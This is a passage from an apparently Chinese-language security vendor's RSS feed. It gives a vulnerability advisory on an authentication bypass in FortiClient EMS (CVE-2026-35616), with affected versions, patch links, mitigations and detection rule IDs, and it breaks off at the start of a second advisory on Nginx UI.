leaf="">FortiClient-Enterprise-Management-Server是一款企业级管理服务器软件。它可以帮助企业管理和监控FortiClient终端设备，包括安全策略、软件更新、远程访问等。FortiClient-Enterprise-Management-Server提供了一个集中化的管理平台，使得企业可以更加高效地管理和保护其网络安全。此外，该软件还提供了实时监控和报告功能，帮助企业及时发现和解决网络安全问题。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041709" src="https://wechat2rss.xlab.app/img-proxy/?k=00716a98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxT8092hMmck9rEp0o76Og2IQ0mRe0yO0s51na2hVEhHiclT5YHlrDhibhy4ydEj2CxDfzwXVlNcyIb4veTDJTUgmgGiaoOEVp06XU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月21日，深瞳漏洞实验室监测到一则FortiClient-Enterprise-Management-Server组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-35616，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Fortinet FortiClient EMS 存在 API 身份验证和授权绕过漏洞，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">攻击者可以通过向目标服务器发送精心构造的请求，利用其内部微服务路由及通信间的鉴权缺陷，绕过前端身份验证机制；在无需提供有效认证凭据的情况下，攻击者可直接越权访问并调用后端核心 API 接口，进而对系统配置、端点策略或敏感数据执行未经授权的读取与修改等恶意操作。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的FortiClient-Enterprise-Management-Server版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">7.4.5≤ FortiClientEMS ≤7.4.6</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041710" src="https://wechat2rss.xlab.app/img-proxy/?k=6c49ab42&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRpMQ38aZdj2E3iceuWpiczMibD00iaNuSNf0ziaEPBsGGic3XlBzQRolz3eNCXLO8xZR1QOTutziclPdzRurPhLgtibed15WniaqZxicNls%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布补丁修复该漏洞，建议受影响用户将FortiClient EMS 7.4.5 和 7.4.6版本进行热修复。</span><span leaf=""><br/></span><span leaf="">下载链接：</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484" target="_blank">https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484</a> - 适用于FortiClientEMS 7.4.5</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484" target="_blank">https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484</a> - for FortiClientEMS 7.4.6</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041711" src="https://wechat2rss.xlab.app/img-proxy/?k=d3c484c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRW5vc5n7LGM201uicO9jGrKRibicKJia9iaFfYgwKxSxRhPVGsdY1Imrvhh7mTndn4dTUKniacbPPQtTpze5Cxapduh7QiaEIboTVpAw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041714" src="https://wechat2rss.xlab.app/img-proxy/?k=5cc3a539&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQQe5Osb9ibwj39h6QXPqHFD7WvDTfSqypCgOOUhdYGqZT3DnH6qlHhekG3zrmtbdC0lfoKkhj79yvunc7nLsdIw6KRGlBUPJ7A%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiClient-Enterprise-Management-Server的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】 </span></span></strong><span leaf="">已发布资产检测方案，指纹ID:002</span><span style="box-sizing: border-box;"><span leaf="">8448。</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0028448。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年04月26日发布检测方案，规则ID:SF-2026-00903。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案，规则ID:SF-2026-01014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年05月30日发布检测方案（需要具备TSS组件能力），规则ID:SF-2026-01014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月26日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00903。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，</span></span></strong><span leaf="">快速检查受影响范围，相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案（需要具备SIP组件能力），规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对FortiClientEMS绕过认证漏洞(CVE-2026-35616)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11220409。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11220409。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-099" target="_blank">https://fortiguard.fortinet.com/psirt/FG-IR-26-099</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/21</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到FortiClientEMS绕过认证漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/22</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5314814814814814" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041718" src="https://wechat2rss.xlab.app/img-proxy/?k=a3357077&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxT3AfoklD0CeRaJ1jZIDKsSncs4j5z4l2qFZOnUib9ljZy1ZNE68MfVjqG6DThHVajeuUgzZqotwAl790BHfbkwabUv8leTNjL8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_14617%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=26bcd18b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525367%26idx%3D1%26sn%3De73780f0f75d9788028f066f5abdcb82">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 22 Apr 2026 15:32:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525356&amp;idx=1&amp;sn=937dcf233c3dd1df9a2d77f81c9a211b</link>
      <description>2026年4月16日，深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-33032，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-17 16:37</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=38a64ba1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxRIKhrCYbxcUYWf5Dg7yPL1UsfoGZZqNOBgQJcVbKWCSobpCtbxpGZb1lNfKslHgtADaZpnhjvBPSV5twH4o092KibHMae4X0ick%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月16日，深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-33032，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041701" src="https://wechat2rss.xlab.app/img-proxy/?k=160f8a39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQRq9OgbN47S3qs8K7Ta8PYM65IKMwxwHuibGbLvuyMia9214iavLQ2ZM7OplEK6lc3ypleu02r1Dp1icU2gDsmF1cibCGRgMBBpeLg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p 